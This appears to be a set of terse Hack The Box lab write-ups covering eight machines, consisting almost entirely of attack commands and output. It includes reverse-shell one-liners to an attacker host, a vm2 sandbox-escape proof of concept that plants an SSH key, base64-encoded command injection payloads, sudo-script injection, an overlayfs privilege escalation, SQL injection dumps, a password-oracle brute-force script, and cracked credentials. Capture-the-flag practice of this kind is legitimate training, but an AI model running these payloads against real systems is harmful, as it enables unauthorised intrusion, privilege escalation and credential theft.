
HTB-Writeups - bizness

echo "RHOST bizness.htb" >> /etc/hosts

nmap -p- --open IP -sV -v

22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http nginx 1.18.0
443/tcp open ssl/http nginx 1.18.0
46027/tcp open tcpwrapped

ffuf -w wordlists/dicc.txt -u https://bizness.htb/FUZZ -mc 200

index.html
control/
control
solr/admin/file/?file=solrconfig.xml
solr/admin/
control/login

git clone https://github.com/mickdec/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz

nc -nlvp 4444

python3 Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz/ofbiz_exploit.py https://bizness.htb/ shell LHOST:4444

python3 -c 'import pty;pty.spawn("/bin/bash")'

cat /opt/ofbiz/framework/resources/templates/AdminUserLoginData.xml

grep -irE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' *
grep --color=auto -rnw -iIe "PASSW\|PASSWD\|PASSWORD\|PWD" --color=always 2>/dev/null

HTB-Writeups - codify

10.10.11.239/codify.htb

ping 10.10.11.239
nmap -p- --open -v -sV 10.10.11.239

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
3000/tcp open http Node.js Express framework

edit /etc/hosts

10.10.11.239 codify.htb

about us > The vm2 library > CVE-2023-32314
https://github.com/advisories/GHSA-cchq-frgv-rjh5
https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9

// Public PoC for the vm2 sandbox escape tracked as CVE-2023-32314 (advisory
// and gist linked above). Host side: a default `new VM()` evaluating the
// untrusted `code` string below.
const {VM} = require("vm2");const vm = new VM();const code = `err = {};const handler = {getPrototypeOf(target) {(function stack() {new Error().stack;stack();})();}};const proxiedErr = new Proxy(err, handler);
try {throw proxiedErr;
} catch ({constructor: c}) {
let cmd = "ls -al";
c.constructor('return process')().mainModule.require('child_process').execSync(cmd);}`
console.log(vm.run(code));
// Inside the sandbox the script throws a Proxy whose getPrototypeOf trap
// recurses without bound (the overflow is presumably what lets a host-realm
// error object leak into the sandbox), catches the resulting error and takes
// its `constructor`, then reaches the host `process` via
// Function('return process') and runs `cmd` with child_process.execSync.
// console.log prints whatever vm.run returns, i.e. the script's completion
// value (execSync's result). Defensive takeaway: a vm2 release affected by
// the advisory gives any evaluated script host code execution, so the fix is
// the patched release the advisory names; nothing in this snippet is special.

ssh-keygen -t rsa -b 4096 -f x.key
cat x.key.pub

// Same PoC as above with only `cmd` changed: it creates `.ssh` and writes the
// public key produced by the ssh-keygen step above (x.key.pub) into
// ~/.ssh/authorized_keys of the account running the service (`>` overwrites
// any existing file). That is what the `ssh svc@... -i x.key` login below
// relies on.
const {VM} = require("vm2");const vm = new VM();const code = `err = {};const handler = {getPrototypeOf(target) {(function stack() {new Error().stack;stack();})();}};const proxiedErr = new Proxy(err, handler);
try {throw proxiedErr;
} catch ({constructor: c}) {
let cmd = "ls -al;mkdir .ssh;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDW+RGnsmYGrsgCL/u0+NSnoevC+okNP2gN/iSjtN28Y0mxe4/eEgRsrgNRY5fryZT4Ml1kBdo9qil0QskwjhoFK1YFDw8BIJaSYuN0922fx3HNLWIo2tk2k3px74uR76FFryZeem2fyBIIjKiTRjVeNFVH8qSwboUhfzfWgqOnvuhuu4U7LFVyZ8KboAUE3BS4DEW+sqPnb2ECNGLiyb6AjzAr2C6j3YBty9d2P+e4BU92C9CfB+e/CRDXon/Hf4KRoif4ez2KwUZQk33z3x4AOz/W+O15f2G5DDNW8oJNcEB3eHrFyiP83bkt2u1bPcExBO+9f2CpEv2zTvHgkjfjSI1xKsuLJHYJWXberraNr4WiiQed/0KtCTsz3yVMeeVUu7I+IG4BmeNHjkVwkotgf8OsWTFRYAZ/0A4L/pbSKSRvtwHSvRA/uwxhkdSTg6YfoygK97bSXLHzgZUenVyOlPIPH2yl2OW7uXkwfBADJ92WZnMOWg9/u16zvLgmh3asCxnggKdZRAVHG3YOhtFsOTYTZRlLcY02sSkBgFjnCgdr2DTwEiitGn32Ha5IfCg7pXwEuwEmQcOilLxU0MOuoebB8s6ovi/xAkEpUc8HgZ1kVhLd3V6UJeI9tbIGCb06YvRtv4gggTe8CMow1mY+oufmEFntl2DyTkcpw+si6w==' > ~/.ssh/authorized_keys";
c.constructor('return process')().mainModule.require('child_process').execSync(cmd);}`
console.log(vm.run(code));
// Detection angle for defenders: a Node.js process spawning a shell through
// child_process, and a write to an authorized_keys file by a web-service
// account, are both high-signal events worth alerting on.

ssh svc@10.10.11.239 -i x.key

cat /var/www/contact/tickets.db

joshua
$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2

.\hashcat.exe -a 0 -m 3200 x rockyou.txt

ssh joshua@10.10.11.239

cat user.txt

sudo -l
cat /opt/scripts/mysql-backup.sh

import string
import os

def check_password(p: str) -> int:
    """Oracle helper: pipe ``p`` followed by ``*`` into the sudo-allowed
    backup script and report whether its output contains the success line.

    Returns 1 when "Password confirmed!" is found, else 0.

    Review notes:
    - Defined but never called; the loop below inlines the same logic.
    - ``result`` is the list from ``readlines()``, whose items keep their
      trailing newline, so ``"Password confirmed!" in result`` compares whole
      lines and only matches if the script prints exactly that text as its
      final line without a newline.
    - ``p`` is interpolated unquoted into a shell line, so it is only safe
      for the alphanumeric charset used below.
    - The trailing ``*`` is only meaningful if the script compares the
      password with a glob/pattern match rather than literally — assumed
      from this usage, since mysql-backup.sh itself is not shown. A literal
      comparison (never interpolating input into a pattern) is the fix on
      the script side.
    """
    os.system(f"echo '{p}*' | sudo /opt/scripts/mysql-backup.sh > RES")
    # Output is captured through a scratch file named RES in the cwd.
    f = open("RES","r")
    result = f.readlines()
    f.close()
    if "Password confirmed!" in result:
        return 1
    else:
        return 0

# Character set the guess is built from; each accepted character is
# appended to end_p.
charset = string.ascii_letters + string.digits
end_p = ""
notfnd = True

# NOTE(review): notfnd is never set to False, so this loop only ends on
# Ctrl-C (or on the IndexError noted below); the operator reads the partial
# result from the print() each round.
while notfnd:
    for char in charset:
        # Same oracle as check_password() above, inlined: try the current
        # prefix plus one more character, with a trailing "*".
        os.system(f"echo '{end_p + char}*' | sudo /opt/scripts/mysql-backup.sh > RES")
        f = open("RES","r")
        result = f.readlines()
        f.close()
        print(end_p)
        # Only the second output line is inspected; fewer than two lines
        # raises IndexError. The character is kept when that line does not
        # contain the failure message.
        if not "Password confirmation failed!" in result[1]:
            end_p += char

python3 x.py
su

HTB-Writeups - analytics

10.10.11.233/analytical.htb

ping 10.10.11.233
nmap -p- --open -v -sV 10.10.11.233

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)

edit /etc/hosts

10.10.11.233 analytical.htb
10.10.11.233 data.analytical.htb

CVE-2023-38646
https://github.com/m3m0o/metabase-pre-auth-rce-poc

http://data.analytical.htb/api/session/properties
setup-token "249fa03d-fd94-4d5b-b94f-b4ebf3df681f"

nc -nlvp 4444

python3 main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "bash -i >& /dev/tcp/LHOST/4444 0>&1"

cat /proc/self/environ

metalytics:An4lytics_ds20223#
ssh metalytics@analytical.htb

cat user.txt

uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'

cat /root/root.txt

HTB-Writeups - surveillance

10.10.11.245/surveillance.htb/

edit /etc/hosts

10.10.11.245 surveillance.htb

ping 10.10.11.245
nmap -p- -sV -v 10.10.11.245

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)

https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226

nc -nlvp 4444
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc LHOST 4444 >/tmp/f

unzip /html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip
cat surveillance--2023-10-17-202801--v4.4.14.sql | grep 'users'

admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec'

hashcat -m 1400 p rockyou.txt

matthew:starcraft122490

ssh matthew@10.10.11.245

netstat -ntlp

8080 LISTEN

https://github.com/rvizx/CVE-2023-26035

ssh -L 8081:localhost:8080 matthew@10.10.11.245
nc -nlvp 4445
python3 exploit.py -t http://localhost:8081/ -ip LHOST -p 4445
python3 -c 'import pty;pty.spawn("/bin/bash")'

nc -nlvp 4444
sudo -v
sudo zmupdate.pl --version=1 --user=';$(rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc LHOST 4444 >/tmp/f)'

HTB-Writeups - devvortex

10.10.11.242/devvortex.htb

ping 10.10.11.242

edit /etc/hosts
10.10.11.242 devvortex.htb

nmap -p- --open -sV -v 10.10.11.242
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)

ffuf -u http://devvortex.htb/ -w Desktop/wordlists/dns.txt -H "Host: FUZZ.devvortex.htb" -mc 0-299
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 306ms]

edit /etc/hosts
10.10.11.242 dev.devvortex.htb

ffuf -u http://dev.devvortex.htb/FUZZ -w Desktop/wordlists/dicc.txt -mc 0-299
administrator/ [Status: 200, Size: 12211, Words: 2022, Lines: 194, Duration: 1466ms]

https://github.com/Acceis/exploit-CVE-2023-23752/blob/master/exploit.rb
http://dev.devvortex.htb/api/index.php/v1/users?public=true
lewis
logan
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
lewis:P4ntherg0t1n5r3c0n##

http://dev.devvortex.htb/administrator/

http://dev.devvortex.htb/administrator/index.php?option=com_templates&view=template&id=222&file=aG9tZQ==

new file> sh.php> https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

nc -nlvp 4444
http://dev.devvortex.htb/administrator/templates/atum/sh.php
python3 -c 'import pty;pty.spawn("/bin/bash")'

mysql -u lewis -p
use joomla;
select * from sd4fg_users;
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

hashcat -m 3200 hash rockyou.txt
logan:tequieromucho

ssh logan@10.10.11.242
cat /home/logan/user.txt

sudo -l

cat /usr/bin/apport-cli
https://gtfobins.github.io/gtfobins/vi/#shell

sudo apport-cli -f
1>2>V>!/bin/sh
cat /root/root.txt

HTB-Writeups - cozyhosting

10.10.11.230/CozyHosting

ping 10.10.11.230

edit /etc/hosts
10.10.11.230 cozyhosting.htb

nmap -p- --open -sV -v 10.10.11.230
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)

ffuf -u http://cozyhosting.htb/FUZZ -w Desktop/wordlists/dicc.txt -mc 0-299 -fs 0
actuator [Status: 200, Size: 634, Words: 1, Lines: 1, Duration: 40ms]
actuator/env [Status: 200, Size: 4957, Words: 120, Lines: 1, Duration: 42ms]
actuator/mappings [Status: 200, Size: 9938, Words: 108, Lines: 1, Duration: 142ms]
actuator/beans [Status: 200, Size: 127224, Words: 542, Lines: 1, Duration: 80ms]
actuator/health [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 226ms]
actuator/sessions [Status: 200, Size: 148, Words: 1, Lines: 1, Duration: 221ms]
index [Status: 200, Size: 12706, Words: 4263, Lines: 285, Duration: 205ms]
login [Status: 200, Size: 4431, Words: 1718, Lines: 97, Duration: 48ms]

http://cozyhosting.htb/actuator/sessions
08EF47D7E71ACE1ABBBF204F8E9726FF "kanderson"
http://cozyhosting.htb/actuator/mappings
"{POST [/executessh]}"
/admin

edit cookies
http://cozyhosting.htb/admin

POST http://cozyhosting.htb/executessh
host=10.10.11.230
username=x;`{cat,/etc/passwd}`

echo 'bash -i -p >& /dev/tcp/LHOST/4444 0>&1'|base64
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
echo${IFS}xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=|base64${IFS}-d|bash

nc -nlvp 4444
POST http://cozyhosting.htb/executessh host=10.10.11.230&username=x;`echo%24%7BIFS%7Dxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=%7Cbase64%24%7BIFS%7D-d%7Cbash`

python3 -m http.server 8888
wget http://10.10.11.230:8888/cloudhosting-0.0.1.jar
unzip cloudhosting-0.0.1.jar

grep -irE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' *
BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR

cat BOOT-INF/classes/application.properties
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

python3 -c 'import pty;pty.spawn("/bin/bash")'
psql -h localhost -U postgres
\l
q
\c cozyhosting
\dt
q
select * from users;
\q

kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

hashcat -m 3200 hash rockyou.txt
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

ls /home/
josh

ssh josh@10.10.11.230
cat /home/josh/user.txt

sudo -l
https://gtfobins.github.io/gtfobins/ssh/#sudo
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
cat /root/root.txt

HTB-Writeups - keeper

10.10.11.227/keeper.htb

ping 10.10.11.227

edit /etc/hosts
10.10.11.227 keeper.htb
10.10.11.227 tickets.keeper.htb

nmap -p- --open -sV 10.10.11.227
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)

ffuf -u http://tickets.keeper.htb/ret/FUZZ -w Desktop/wordlists/dicc.txt -mc 0-299 -fs 0
index.html [Status: 200, Size: 4236, Words: 407, Lines: 154, Duration: 373ms]
m [Status: 200, Size: 2309, Words: 247, Lines: 112, Duration: 444ms]

https://www.google.com/search?client=firefox-b-e&q=request+tracker+default+credentials
root:password

http://tickets.keeper.htb/rt/Admin/Users/
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27

lnorgaard:Welcome2023!

ssh lnorgaard@10.10.11.227
cat users.txt

python3 -m http.server 8888
wget http://10.10.11.227:8888/RT30000.zip
unzip RT30000.zip

wget https://raw.githubusercontent.com/matro7sh/keepass-dump-masterkey/main/poc.py
python3 poc.py KeePassDumpFull.dmp
rødgrød med fløde

https://app.keeweb.info
root:F4><3K0nd!

create x.key containing the RSA private key
puttygen x.key -O private-openssh -o id-rsa

ssh -i id-rsa root@10.10.11.227
cat root.txt

HTB-Writeups - monitored

10.10.11.248/nagios.monitored.htb
ping 10.10.11.248

edit /etc/hosts
10.10.11.248 nagios.monitored.htb

nmap -p- --open -sV -v 10.10.11.248
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http Apache httpd 2.4.56
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.56 ((Debian))
5667/tcp open tcpwrapped

ldapsearch -H ldap://nagios.monitored.htb:389

nmap -p 161 --open -sU -v 10.10.11.248
snmpbulkwalk -c public -v2c 10.10.11.248 .

svc:XjH7VCehowpR1xZB
openldap
shellinabox

ffuf -u https://nagios.monitored.htb/nagiosxi/FUZZ -w /root/Desktop/wordlists/dicc.txt -mc 0-299 -fs 0
api/v1/swagger.json [Status: 200, Size: 32, Words: 4, Lines: 2, Duration: 135ms]
api/v1/ [Status: 200, Size: 32, Words: 4, Lines: 2, Duration: 199ms]
api/v1/swagger.yaml [Status: 200, Size: 32, Words: 4, Lines: 2, Duration: 205ms]
backend/ [Status: 200, Size: 108, Words: 4, Lines: 5, Duration: 117ms]
login.php [Status: 200, Size: 26575, Words: 5452, Lines: 467, Duration: 118ms]
terminal [Status: 200, Size: 5215, Words: 1247, Lines: 124, Duration: 75ms]

ffuf -u https://nagios.monitored.htb/nagiosxi/api/v1/FUZZ -w /root/Desktop/wordlists/dicc.txt -mc 0-299 -fs 32
authenticate [Status: 200, Size: 53, Words: 7, Lines: 2, Duration: 6891ms]

https://www.nagios.org/ncpa/help/2.2/api.html

curl -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=60'
https://nagios.monitored.htb/nagiosxi/account/

2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=138aa9a02fc57037e422a8a2333af89fe1790014" -p id

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3" --cookie="nagiosxi=qdb15i3ol65q7iv055ump1oqr6" --method POST --dump --drop-set-cookie --technique=ET --dbms=MySQL -p id --risk=3 --level=5 --threads=10

| 1 | admin@monitored.htb | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 1706643300 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 2 | 1701427555 |
| 2 | svc@monitored.htb | svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1706647188 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1

curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=nadmin&password=nadmin&name=nadmin&email=newadmin@monitored.htb&auth_level=admin"

nadmin:nadmin

https://nagios.monitored.htb/nagiosxi/includes/components/ccm/xi-index.php

nc -nlvp 4444
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'

cat user.txt

python3 -c 'import pty;pty.spawn("/bin/bash")'
echo '#!/bin/bash' > /usr/local/nagios/bin/npcd
echo 'bash -i >& /dev/tcp/10.10.14.5/4445 0>&1' >> /usr/local/nagios/bin/npcd
chmod +x /usr/local/nagios/bin/npcd

sudo /usr/local/nagiosxi/scripts/manage_services.sh restart npcd

cat /root/root.txt